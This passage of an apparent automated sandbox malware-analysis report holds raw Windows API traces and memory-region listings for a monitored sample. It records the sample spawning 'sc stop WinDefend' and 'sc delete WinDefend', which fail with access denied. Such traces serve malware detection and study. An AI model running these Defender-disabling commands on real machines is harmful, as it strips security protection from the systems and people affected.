dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0153.270] GetLastError () returned 0xcb [0153.270] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0153.270] GetLastError () returned 0xcb [0153.270] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0153.270] GetLastError () returned 0xcb [0153.270] CloseHandle (hObject=0x83) returned 1 [0153.271] GetLastError () returned 0xcb [0153.275] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0153.275] GetLastError () returned 0xcb [0153.275] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0153.275] GetLastError () returned 0xcb [0153.275] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0153.276] GetLastError () returned 0xcb [0153.276] CloseHandle (hObject=0x83) returned 1 [0153.276] GetLastError () returned 0xcb [0153.280] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0153.281] GetLastError () returned 0xcb [0153.281] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x5f5efec | out: lpMode=0x5f5efec) returned 1 [0153.281] GetLastError () returned 0xcb [0153.281] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5f5efec, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x5f5efec*=0x1) returned 1 [0153.281] GetLastError () returned 0xcb [0153.281] CloseHandle (hObject=0x83) returned 1 [0153.282] GetLastError () returned 0xcb [0153.286] SetEvent (hEvent=0x344) returned 1 [0153.286] GetLastError () returned 0xcb [0153.286] SetEvent (hEvent=0x1ec) returned 1 [0153.286] GetLastError () returned 0xcb [0153.286] SetEvent (hEvent=0x324) returned 1 [0153.287] GetLastError () returned 0xcb [0153.287] SetEvent (hEvent=0x328) returned 1 [0153.287] GetLastError () returned 0xcb [0153.287] SetEvent (hEvent=0x35c) returned 1 [0153.287] GetLastError () returned 0xcb [0153.287] SetEvent (hEvent=0x350) returned 1 [0153.287] GetLastError () returned 0xcb [0153.287] SetEvent (hEvent=0x354) returned 1 [0153.287] GetLastError () returned 0xcb [0153.287] SetEvent (hEvent=0x358) returned 1 [0153.287] GetLastError () returned 0xcb [0153.287] SetEvent (hEvent=0x3a8) returned 1 [0153.287] GetLastError () returned 0xcb [0153.287] CoUninitialize () Thread: id = 214 os_tid = 0x554 [0153.352] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0153.374] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.375] VirtualQuery (in: lpAddress=0x5f2e3d0, lpBuffer=0x5f2f3d0, dwLength=0x1c | out: lpBuffer=0x5f2f3d0*(BaseAddress=0x5f2e000, AllocationBase=0x55a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.375] VirtualQuery (in: lpAddress=0x5f2e4ec, lpBuffer=0x5f2f4ec, dwLength=0x1c | out: lpBuffer=0x5f2f4ec*(BaseAddress=0x5f2e000, AllocationBase=0x55a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.378] SetEvent (hEvent=0x3c0) returned 1 [0153.378] GetLastError () returned 0x0 [0153.378] SetEvent (hEvent=0x3c4) returned 1 [0153.378] GetLastError () returned 0x0 [0153.378] SetEvent (hEvent=0x3cc) returned 1 [0153.378] GetLastError () returned 0x0 [0153.378] SetEvent (hEvent=0x3c0) returned 1 [0153.378] GetLastError () returned 0x0 [0153.378] SetEvent (hEvent=0x3c4) returned 1 [0153.378] GetLastError () returned 0x0 [0153.378] SetEvent (hEvent=0x3dc) returned 1 [0153.378] GetLastError () returned 0x0 [0153.378] SetEvent (hEvent=0x3d0) returned 1 [0153.378] GetLastError () returned 0x0 [0153.378] SetEvent (hEvent=0x3d4) returned 1 [0153.378] GetLastError () returned 0x0 [0153.378] SetEvent (hEvent=0x3d8) returned 1 [0153.378] GetLastError () returned 0x0 [0153.378] SetEvent (hEvent=0x3e0) returned 1 [0153.378] GetLastError () returned 0x0 [0153.379] CoUninitialize () Process: id = "10" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x3d0d8000" os_pid = "0x398" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x924" cmd_line = "sc stop WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1647 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1648 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1649 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1650 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1651 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1652 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1653 start_va = 0x130000 end_va = 0x13bfff entry_point = 0x130000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 1654 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1655 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1656 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1657 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1658 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1659 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1660 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1661 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1662 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1663 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1702 start_va = 0x290000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1703 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1704 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1705 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1706 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1707 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1708 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1709 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 1710 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 1711 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1712 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1713 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1714 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1715 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1716 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1717 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1718 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1719 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1720 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 1721 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1722 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1723 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1724 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1725 start_va = 0x4d0000 end_va = 0x58ffff entry_point = 0x4d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1732 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x80000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 112 os_tid = 0x66c [0106.246] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf91c | out: lpSystemTimeAsFileTime=0x1cf91c*(dwLowDateTime=0xe3720cb0, dwHighDateTime=0x1d4be3a)) [0106.246] GetCurrentProcessId () returned 0x398 [0106.246] GetCurrentThreadId () returned 0x66c [0106.246] GetTickCount () returned 0x27d78 [0106.246] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf914 | out: lpPerformanceCount=0x1cf914*=1818361800000) returned 1 [0106.246] GetModuleHandleA (lpModuleName=0x0) returned 0x130000 [0106.246] __set_app_type (_Type=0x1) [0106.246] __p__fmode () returned 0x75ca31f4 [0106.246] __p__commode () returned 0x75ca31fc [0106.246] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1379c7) returned 0x0 [0106.246] __wgetmainargs (in: _Argc=0x139020, _Argv=0x139028, _Env=0x139024, _DoWildCard=0, _StartInfo=0x139034 | out: _Argc=0x139020, _Argv=0x139028, _Env=0x139024) returned 0 [0106.247] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.249] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.249] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0106.249] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0106.249] _wcsicmp (_String1="stop", _String2="query") returned 2 [0106.249] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0106.249] _wcsicmp (_String1="stop", _String2="start") returned 14 [0106.249] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0106.250] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0106.250] _wcsicmp (_String1="stop", _String2="control") returned 16 [0106.250] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0106.250] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0106.250] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3dfa08 [0106.252] OpenServiceW (hSCManager=0x3dfa08, lpServiceName="WinDefend", dwDesiredAccess=0x20) returned 0x0 [0106.252] GetLastError () returned 0x5 [0106.252] _itow (in: _Dest=0x5, _Radix=1898420 | out: _Dest=0x5) returned="5" [0106.252] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x139380, nSize=0x400, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0106.726] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x1cf79c, nSize=0x2, Arguments=0x1cf7a8 | out: lpBuffer="ᴐ>\x01") returned 0x33 [0106.891] GetFileType (hFile=0x7) returned 0x2 [0106.892] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf770 | out: lpMode=0x1cf770) returned 1 [0106.892] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3e1d10*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x1cf78c, lpReserved=0x0 | out: lpBuffer=0x3e1d10*, lpNumberOfCharsWritten=0x1cf78c*=0x33) returned 1 [0106.892] LocalFree (hMem=0x3e1d10) returned 0x0 [0106.892] LocalFree (hMem=0x0) returned 0x0 [0106.892] CloseServiceHandle (hSCObject=0x3dfa08) returned 1 [0106.902] exit (_Code=5) Thread: id = 115 os_tid = 0x704 Process: id = "11" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x3cab5000" os_pid = "0x7d4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x910" cmd_line = "sc delete WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1664 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1665 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1666 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1667 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1668 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1669 start_va = 0x130000 end_va = 0x13bfff entry_point = 0x130000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 1670 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1671 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1672 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1673 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1674 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1675 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1676 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1677 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1678 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1679 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1680 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1681 start_va = 0x390000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1682 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1683 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1684 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1685 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1686 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1687 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1688 start_va = 0x4e0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1689 start_va = 0x6e0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 1690 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1691 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1692 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1693 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1694 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1695 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1696 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1697 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1698 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1699 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 1700 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1701 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1726 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1727 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1728 start_va = 0x140000 end_va = 0x1fffff entry_point = 0x140000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1731 start_va = 0xf0000 end_va = 0xfffff entry_point = 0xf0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 113 os_tid = 0x930 [0106.215] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfd8c | out: lpSystemTimeAsFileTime=0x2bfd8c*(dwLowDateTime=0xe36d49f0, dwHighDateTime=0x1d4be3a)) [0106.215] GetCurrentProcessId () returned 0x7d4 [0106.215] GetCurrentThreadId () returned 0x930 [0106.215] GetTickCount () returned 0x27d59 [0106.215] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfd84 | out: lpPerformanceCount=0x2bfd84*=1818358700000) returned 1 [0106.215] GetModuleHandleA (lpModuleName=0x0) returned 0x130000 [0106.215] __set_app_type (_Type=0x1) [0106.215] __p__fmode () returned 0x75ca31f4 [0106.215] __p__commode () returned 0x75ca31fc [0106.215] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1379c7) returned 0x0 [0106.215] __wgetmainargs (in: _Argc=0x139020, _Argv=0x139028, _Env=0x139024, _DoWildCard=0, _StartInfo=0x139034 | out: _Argc=0x139020, _Argv=0x139028, _Env=0x139024) returned 0 [0106.216] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.218] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.218] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0106.218] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0106.218] _wcsicmp (_String1="delete", _String2="query") returned -13 [0106.218] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0106.218] _wcsicmp (_String1="delete", _String2="start") returned -15 [0106.218] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0106.218] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0106.218] _wcsicmp (_String1="delete", _String2="control") returned 1 [0106.218] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0106.218] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0106.218] _wcsicmp (_String1="delete", _String2="config") returned 1 [0106.218] _wcsicmp (_String1="delete", _String2="description") returned -7 [0106.218] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0106.218] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0106.218] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0106.218] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0106.218] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0106.218] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0106.218] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0106.218] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0106.218] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0106.218] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0106.218] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0106.218] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0106.218] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0106.218] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0106.218] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0106.218] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0106.218] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0106.218] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0106.218] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4efa10 [0106.220] OpenServiceW (hSCManager=0x4efa10, lpServiceName="WinDefend", dwDesiredAccess=0x10000) returned 0x0 [0106.221] GetLastError () returned 0x5 [0106.221] _itow (in: _Dest=0x5, _Radix=2882716 | out: _Dest=0x5) returned="5" [0106.221] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x139380, nSize=0x400, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0106.725] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x2bfc84, nSize=0x2, Arguments=0x2bfc90 | out: lpBuffer="ᴘO༄n\x03") returned 0x33 [0106.887] GetFileType (hFile=0x7) returned 0x2 [0106.888] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2bfc58 | out: lpMode=0x2bfc58) returned 1 [0106.888] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4f1d18*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x2bfc74, lpReserved=0x0 | out: lpBuffer=0x4f1d18*, 